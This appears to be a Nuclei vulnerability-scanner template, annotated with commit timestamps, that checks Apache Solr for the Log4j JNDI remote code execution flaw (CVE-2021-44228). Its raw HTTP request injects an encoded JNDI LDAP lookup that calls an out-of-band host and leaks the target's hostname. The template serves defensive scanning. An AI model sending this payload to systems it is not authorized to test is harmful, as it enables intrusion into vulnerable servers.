2021-12-15 15:45:43 +00:00
id : apache-solr-log4j-rce
info :
2022-10-10 19:51:42 +00:00
name : Apache Solr 7+ - Remote Code Execution (Apache Log4j)
2023-04-18 20:34:32 +00:00
author : Evan Rubinstein,nvn1729,j4vaovo
2021-12-15 15:45:43 +00:00
severity : critical
2022-05-31 08:43:47 +00:00
description : |
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
2021-12-15 15:45:43 +00:00
reference :
2021-12-15 15:50:18 +00:00
- https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
2021-12-15 15:45:43 +00:00
- https://twitter.com/sirifu4k1/status/1470011568834424837
- https://github.com/apache/solr/pull/454
2022-07-16 17:08:06 +00:00
- https://logging.apache.org/log4j/2.x/security.html
2022-05-27 15:55:31 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
2023-04-18 20:39:06 +00:00
- https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228
2022-05-27 15:55:31 +00:00
classification :
2022-10-10 20:06:39 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10
2022-10-10 19:51:42 +00:00
cve-id : CVE-2021-44228
2022-10-19 21:11:27 +00:00
cwe-id : CWE-77
2022-07-18 06:34:43 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-06-04 08:13:42 +00:00
verified : true
2023-04-19 20:43:36 +00:00
shodan-query : http.html:"Apache Solr"
2023-04-20 08:33:19 +00:00
tags : vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
2021-12-15 15:45:43 +00:00
2023-05-03 17:51:44 +00:00
variables :
rand1 : '{{rand_int(111, 999)}}'
rand2 : '{{rand_int(111, 999)}}'
2023-04-27 04:28:59 +00:00
http :
2023-04-18 20:34:32 +00:00
- raw :
- |
@timeout : 25s
2023-05-03 18:21:23 +00:00
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
2023-04-18 20:34:32 +00:00
Host : {{Hostname}}
2023-04-19 20:43:36 +00:00
attack : clusterbomb
payloads :
endpoint :
- "collections"
- "cores"
2021-12-15 15:45:43 +00:00
matchers-condition : and
matchers :
2023-01-11 06:34:21 +00:00
- type : word
part : body
words :
2023-04-18 20:34:32 +00:00
- 'org.apache.solr'
2023-01-11 06:34:21 +00:00
2021-12-15 15:45:43 +00:00
- type : word
2023-04-18 20:34:32 +00:00
part : interactsh_protocol
2021-12-15 15:45:43 +00:00
words :
- "dns"
- type : regex
part : interactsh_request
regex :
2023-05-03 17:51:44 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
2023-04-18 21:18:33 +00:00
extractors :
2023-05-03 18:21:23 +00:00
- type : kval
kval :
- interactsh_ip # Print remote interaction IP in output
- type : regex
part : interactsh_request
group : 2
regex :
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
2023-04-18 21:18:33 +00:00
- type : regex
part : interactsh_request
2023-05-03 17:51:44 +00:00
group : 1
2023-04-18 21:18:33 +00:00
regex :
2023-05-03 17:51:44 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output